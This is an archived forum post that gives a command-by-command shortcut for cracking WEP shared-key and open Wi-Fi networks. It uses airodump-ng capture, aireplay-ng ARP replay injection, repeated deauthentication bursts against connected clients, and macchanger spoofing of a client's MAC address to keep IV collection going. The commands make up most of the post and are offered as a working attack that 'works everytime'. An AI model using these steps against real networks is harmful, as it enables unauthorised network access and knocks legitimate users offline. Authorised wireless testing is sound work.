PDA

View Full Version : WEP SKA Shortcut and Handling Open System Aireplay-ng -3 deauth/dissassociation



mmusket33
2014-03-17, 02:46
We are running into WEP SKA more and more. Aircrack-ng has a long involved procedure for ska. Before you use this procedure try this shortcut.
Start airodump-ng
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0
Start aireplay -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0
Send a few deauth bursts
aireplay-ng -0 10 -a TA:RG:ET:MA:CO:DE mon0

Look to see if a client exists in the airodump-ng window?

If client present but you get low iv production and an occassional to constant death/dissassociation warnings in your aireplay-ng -3 window.

Try this:

Stop all processes listed above.

Change the mac of mon0 to that of the client present even if the client is sitting idle.
ifconfig mon0 down
macchanger -m CL:IE:NT:MA:CO:DE mon0
ifconfig mon0 up

Restart airodump-ng again
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0

Retart aireplay -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0

Send a few more deauth bursts
aireplay -0 10 -a TA:RG:ET:MA:CO:DE mon0

Usually iv production just takes off. If this doesnot work then wait for a different client or try the aircrack-ng approach.

Furthermore in WEP open systems, if you run up your ivs to around 500 and then start getting deauth/dissassociation warning in the aireplay-ng -3 attack window use the same technique of spoofing the mac of the client and restart the attack. For us it works everytime.

MTA